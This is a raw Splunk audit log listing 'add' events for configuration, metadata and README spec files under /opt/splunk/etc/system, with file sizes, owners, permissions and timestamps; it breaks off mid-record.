Audit:[timestamp=10-06-2022 17:43:09.093, user=n/a, action=add,path="/opt/splunk/etc/system/default/fields.conf", isdir=0, size=2169, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:09.090, user=n/a, action=add,path="/opt/splunk/etc/system/default/federated.conf", isdir=0, size=599, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:09.084, user=n/a, action=add,path="/opt/splunk/etc/system/default/eventtypes.conf", isdir=0, size=1634, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:09.080, user=n/a, action=add,path="/opt/splunk/etc/system/default/eventdiscoverer.conf", isdir=0, size=4777, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:09.076, user=n/a, action=add,path="/opt/splunk/etc/system/default/event_renderers.conf", isdir=0, size=620, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:09.071, user=n/a, action=add,path="/opt/splunk/etc/system/default/distsearch.conf", isdir=0, size=2901, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:09.065, user=n/a, action=add,path="/opt/splunk/etc/system/default/default-mode.conf", isdir=0, size=819, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:09.061, user=n/a, action=add,path="/opt/splunk/etc/system/default/datatypesbnf.conf", isdir=0, size=1207, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:09.057, user=n/a, action=add,path="/opt/splunk/etc/system/default/datamodels.conf", isdir=0, size=1870, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:09.053, user=n/a, action=add,path="/opt/splunk/etc/system/default/data", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:16 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:09.049, user=n/a, action=add,path="/opt/splunk/etc/system/default/conf.conf", isdir=0, size=7234, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:09.045, user=n/a, action=add,path="/opt/splunk/etc/system/default/commands.conf", isdir=0, size=2374, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:09.041, user=n/a, action=add,path="/opt/splunk/etc/system/default/collections.conf", isdir=0, size=820, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:09.037, user=n/a, action=add,path="/opt/splunk/etc/system/default/authorize.conf", isdir=0, size=11668, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:09.033, user=n/a, action=add,path="/opt/splunk/etc/system/default/authentication.conf", isdir=0, size=1343, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:09.030, user=n/a, action=add,path="/opt/splunk/etc/system/default/audit.conf", isdir=0, size=435, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:09.026, user=n/a, action=add,path="/opt/splunk/etc/system/default/app.conf", isdir=0, size=3200, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:09.021, user=n/a, action=add,path="/opt/splunk/etc/system/default/alert_actions.conf", isdir=0, size=7957, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.514, user=n/a, action=add,path="/opt/splunk/etc/system/metadata/local.meta", isdir=0, size=581, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:18 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:08.511, user=n/a, action=add,path="/opt/splunk/etc/system/metadata/default.meta", isdir=0, size=336, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.507, user=n/a, action=add,path="/opt/splunk/etc/system/README/workload_rules.conf.spec", isdir=0, size=9271, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.503, user=n/a, action=add,path="/opt/splunk/etc/system/README/workload_rules.conf.example", isdir=0, size=1104, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.500, user=n/a, action=add,path="/opt/splunk/etc/system/README/workload_pools.conf.spec", isdir=0, size=5761, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.495, user=n/a, action=add,path="/opt/splunk/etc/system/README/workload_pools.conf.example", isdir=0, size=884, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.492, user=n/a, action=add,path="/opt/splunk/etc/system/README/workload_policy.conf.spec", isdir=0, size=1467, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.487, user=n/a, action=add,path="/opt/splunk/etc/system/README/workload_policy.conf.example", isdir=0, size=116, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.482, user=n/a, action=add,path="/opt/splunk/etc/system/README/workflow_actions.conf.spec", isdir=0, size=7741, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.478, user=n/a, action=add,path="/opt/splunk/etc/system/README/workflow_actions.conf.example", isdir=0, size=2772, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.473, user=n/a, action=add,path="/opt/splunk/etc/system/README/wmi.conf.spec", isdir=0, size=10563, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.470, user=n/a, action=add,path="/opt/splunk/etc/system/README/wmi.conf.example", isdir=0, size=2986, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.466, user=n/a, action=add,path="/opt/splunk/etc/system/README/web.conf.spec", isdir=0, size=60987, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.462, user=n/a, action=add,path="/opt/splunk/etc/system/README/web.conf.example", isdir=0, size=1269, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.458, user=n/a, action=add,path="/opt/splunk/etc/system/README/visualizations.conf.spec", isdir=0, size=5464, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.453, user=n/a, action=add,path="/opt/splunk/etc/system/README/viewstates.conf.spec", isdir=0, size=1659, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.448, user=n/a, action=add,path="/opt/splunk/etc/system/README/viewstates.conf.example", isdir=0, size=1145, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.444, user=n/a, action=add,path="/opt/splunk/etc/system/README/user-seed.conf.spec", isdir=0, size=1695, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.440, user=n/a, action=add,path="/opt/splunk/etc/system/README/user-seed.conf.example", isdir=0, size=1005, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.437, user=n/a, action=add,path="/opt/splunk/etc/system/README/user-prefs.conf.spec", isdir=0, size=4534, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.433, user=n/a, action=add,path="/opt/splunk/etc/system/README/user-prefs.conf.example", isdir=0, size=830, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.430, user=n/a, action=add,path="/opt/splunk/etc/system/README/ui-tour.conf.spec", isdir=0, size=5250, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.426, user=n/a, action=add,path="/opt/splunk/etc/system/README/ui-tour.conf.example", isdir=0, size=1120, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.421, user=n/a, action=add,path="/opt/splunk/etc/system/README/ui-prefs.conf.spec", isdir=0, size=4417, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.417, user=n/a, action=add,path="/opt/splunk/etc/system/README/ui-prefs.conf.example", isdir=0, size=743, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.412, user=n/a, action=add,path="/opt/splunk/etc/system/README/transforms.conf.spec", isdir=0, size=46259, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.408, user=n/a, action=add,path="/opt/splunk/etc/system/README/transforms.conf.example", isdir=0, size=10471, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.402, user=n/a, action=add,path="/opt/splunk/etc/system/README/transactiontypes.conf.spec", isdir=0, size=6374, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.398, user=n/a, action=add,path="/opt/splunk/etc/system/README/transactiontypes.conf.example", isdir=0, size=574, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.392, user=n/a, action=add,path="/opt/splunk/etc/system/README/times.conf.spec", isdir=0, size=4246, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.387, user=n/a, action=add,path="/opt/splunk/etc/system/README/times.conf.example", isdir=0, size=2412, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.383, user=n/a, action=add,path="/opt/splunk/etc/system/README/tags.conf.spec", isdir=0, size=1482, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.379, user=n/a, action=add,path="/opt/splunk/etc/system/README/tags.conf.example", isdir=0, size=1075, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.374, user=n/a, action=add,path="/opt/splunk/etc/system/README/splunk-launch.conf.spec", isdir=0, size=9573, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.370, user=n/a, action=add,path="/opt/splunk/etc/system/README/sourcetypes.conf.spec", isdir=0, size=1584, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.365, user=n/a, action=add,path="/opt/splunk/etc/system/README/sourcetypes.conf.example", isdir=0, size=1067, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.362, user=n/a, action=add,path="/opt/splunk/etc/system/README/source-classifier.conf.spec", isdir=0, size=1113, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.357, user=n/a, action=add,path="/opt/splunk/etc/system/README/source-classifier.conf.example", isdir=0, size=1291, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.353, user=n/a, action=add,path="/opt/splunk/etc/system/README/setup.xml.spec", isdir=0, size=6747, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.349, user=n/a, action=add,path="/opt/splunk/etc/system/README/serverclass.seed.xml.spec", isdir=0, size=2178, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.345, user=n/a, action=add,path="/opt/splunk/etc/system/README/serverclass.seed.xml.example", isdir=0, size=1482, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.341, user=n/a, action=add,path="/opt/splunk/etc/system/README/serverclass.conf.spec", isdir=0, size=17136, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.338, user=n/a, action=add,path="/opt/splunk/etc/system/README/serverclass.conf.example", isdir=0, size=3399, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.334, user=n/a, action=add,path="/opt/splunk/etc/system/README/server.conf.spec", isdir=0, size=262022, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.329, user=n/a, action=add,path="/opt/splunk/etc/system/README/server.conf.example", isdir=0, size=4370, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.326, user=n/a, action=add,path="/opt/splunk/etc/system/README/segmenters.conf.spec", isdir=0, size=4907, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.321, user=n/a, action=add,path="/opt/splunk/etc/system/README/segmenters.conf.example", isdir=0, size=882, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.316, user=n/a, action=add,path="/opt/splunk/etc/system/README/searchbnf.conf.spec", isdir=0, size=8524, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.311, user=n/a, action=add,path="/opt/splunk/etc/system/README/searchbnf.conf.example", isdir=0, size=1105, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.306, user=n/a, action=add,path="/opt/splunk/etc/system/README/savedsearches.conf.spec", isdir=0, size=51947, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.302, user=n/a, action=add,path="/opt/splunk/etc/system/README/savedsearches.conf.example", isdir=0, size=2543, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.296, user=n/a, action=add,path="/opt/splunk/etc/system/README/restmap.conf.spec", isdir=0, size=17097, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.292, user=n/a, action=add,path="/opt/splunk/etc/system/README/restmap.conf.example", isdir=0, size=1615, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.289, user=n/a, action=add,path="/opt/splunk/etc/system/README/pubsub.conf.spec", isdir=0, size=2543, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.284, user=n/a, action=add,path="/opt/splunk/etc/system/README/pubsub.conf.example", isdir=0, size=155, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.279, user=n/a, action=add,path="/opt/splunk/etc/system/README/props.conf.spec", isdir=0, size=78889, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.274, user=n/a, action=add,path="/opt/splunk/etc/system/README/props.conf.example", isdir=0, size=4807, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.270, user=n/a, action=add,path="/opt/splunk/etc/system/README/procmon-filters.conf.spec", isdir=0, size=998, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.265, user=n/a, action=add,path="/opt/splunk/etc/system/README/procmon-filters.conf.example", isdir=0, size=640, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.261, user=n/a, action=add,path="/opt/splunk/etc/system/README/passwords.conf.spec", isdir=0, size=967, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.257, user=n/a, action=add,path="/opt/splunk/etc/system/README/passwords.conf.example", isdir=0, size=1083, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.251, user=n/a, action=add,path="/opt/splunk/etc/system/README/outputs.conf.spec", isdir=0, size=67655, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.245, user=n/a, action=add,path="/opt/splunk/etc/system/README/outputs.conf.example", isdir=0, size=5021, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.240, user=n/a, action=add,path="/opt/splunk/etc/system/README/multikv.conf.spec", isdir=0, size=4925, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.231, user=n/a, action=add,path="/opt/splunk/etc/system/README/multikv.conf.example", isdir=0, size=2226, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.227, user=n/a, action=add,path="/opt/splunk/etc/system/README/migration.conf.spec", isdir=0, size=837, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.222, user=n/a, action=add,path="/opt/splunk/etc/system/README/metric_rollups.conf.spec", isdir=0, size=6116, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.217, user=n/a, action=add,path="/opt/splunk/etc/system/README/metric_rollups.conf.example", isdir=0, size=1493, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.212, user=n/a, action=add,path="/opt/splunk/etc/system/README/metric_alerts.conf.spec", isdir=0, size=9240, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.208, user=n/a, action=add,path="/opt/splunk/etc/system/README/metric_alerts.conf.example", isdir=0, size=876, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.204, user=n/a, action=add,path="/opt/splunk/etc/system/README/messages.conf.spec", isdir=0, size=5001, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.198, user=n/a, action=add,path="/opt/splunk/etc/system/README/messages.conf.example", isdir=0, size=2184, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.194, user=n/a, action=add,path="/opt/splunk/etc/system/README/macros.conf.spec", isdir=0, size=4024, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.191, user=n/a, action=add,path="/opt/splunk/etc/system/README/macros.conf.example", isdir=0, size=1677, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.187, user=n/a, action=add,path="/opt/splunk/etc/system/README/livetail.conf.spec", isdir=0, size=1951, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.182, user=n/a, action=add,path="/opt/splunk/etc/system/README/livetail.conf.examples", isdir=0, size=1307, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.179, user=n/a, action=add,path="/opt/splunk/etc/system/README/literals.conf.spec", isdir=0, size=207, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.173, user=n/a, action=add,path="/opt/splunk/etc/system/README/literals.conf.example", isdir=0, size=205, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.170, user=n/a, action=add,path="/opt/splunk/etc/system/README/limits.conf.spec", isdir=0, size=176848, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.167, user=n/a, action=add,path="/opt/splunk/etc/system/README/limits.conf.example", isdir=0, size=5139, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.163, user=n/a, action=add,path="/opt/splunk/etc/system/README/instance.cfg.spec", isdir=0, size=1891, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.160, user=n/a, action=add,path="/opt/splunk/etc/system/README/instance.cfg.example", isdir=0, size=248, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.156, user=n/a, action=add,path="/opt/splunk/etc/system/README/inputs.conf.spec", isdir=0, size=161933, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.152, user=n/a, action=add,path="/opt/splunk/etc/system/README/inputs.conf.example", isdir=0, size=6311, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.148, user=n/a, action=add,path="/opt/splunk/etc/system/README/indexes.conf.spec", isdir=0, size=127864, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.144, user=n/a, action=add,path="/opt/splunk/etc/system/README/indexes.conf.example", isdir=0, size=8052, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.131, user=n/a, action=add,path="/opt/splunk/etc/system/README/health.conf.spec", isdir=0, size=5801, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.127, user=n/a, action=add,path="/opt/splunk/etc/system/README/health.conf.example", isdir=0, size=6751, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.124, user=n/a, action=add,path="/opt/splunk/etc/system/README/global-banner.conf.spec", isdir=0, size=1719, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.120, user=n/a, action=add,path="/opt/splunk/etc/system/README/global-banner.conf.example", isdir=0, size=786, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.116, user=n/a, action=add,path="/opt/splunk/etc/system/README/fshpasswords.conf.spec", isdir=0, size=796, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.112, user=n/a, action=add,path="/opt/splunk/etc/system/README/fshpasswords.conf.example", isdir=0, size=800, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.108, user=n/a, action=add,path="/opt/splunk/etc/system/README/fields.conf.spec", isdir=0, size=6119, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.103, user=n/a, action=add,path="/opt/splunk/etc/system/README/fields.conf.example", isdir=0, size=790, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.099, user=n/a, action=add,path="/opt/splunk/etc/system/README/federated.conf.spec", isdir=0, size=4299, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.095, user=n/a, action=add,path="/opt/splunk/etc/system/README/federated.conf.example", isdir=0, size=457, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.090, user=n/a, action=add,path="/opt/splunk/etc/system/README/eventtypes.conf.spec", isdir=0, size=3358, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.086, user=n/a, action=add,path="/opt/splunk/etc/system/README/eventtypes.conf.example", isdir=0, size=1018, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.081, user=n/a, action=add,path="/opt/splunk/etc/system/README/eventdiscoverer.conf.spec", isdir=0, size=2220, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.077, user=n/a, action=add,path="/opt/splunk/etc/system/README/eventdiscoverer.conf.example", isdir=0, size=799, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.073, user=n/a, action=add,path="/opt/splunk/etc/system/README/event_renderers.conf.spec", isdir=0, size=2041, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.068, user=n/a, action=add,path="/opt/splunk/etc/system/README/event_renderers.conf.example", isdir=0, size=743, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.064, user=n/a, action=add,path="/opt/splunk/etc/system/README/distsearch.conf.spec", isdir=0, size=30036, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.060, user=n/a, action=add,path="/opt/splunk/etc/system/README/distsearch.conf.example", isdir=0, size=1675, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.054, user=n/a, action=add,path="/opt/splunk/etc/system/README/deploymentclient.conf.spec", isdir=0, size=10597, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.049, user=n/a, action=add,path="/opt/splunk/etc/system/README/deploymentclient.conf.example", isdir=0, size=2472, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.044, user=n/a, action=add,path="/opt/splunk/etc/system/README/deployment.conf.spec", isdir=0, size=356, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.039, user=n/a, action=add,path="/opt/splunk/etc/system/README/default.meta.spec", isdir=0, size=2472, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.034, user=n/a, 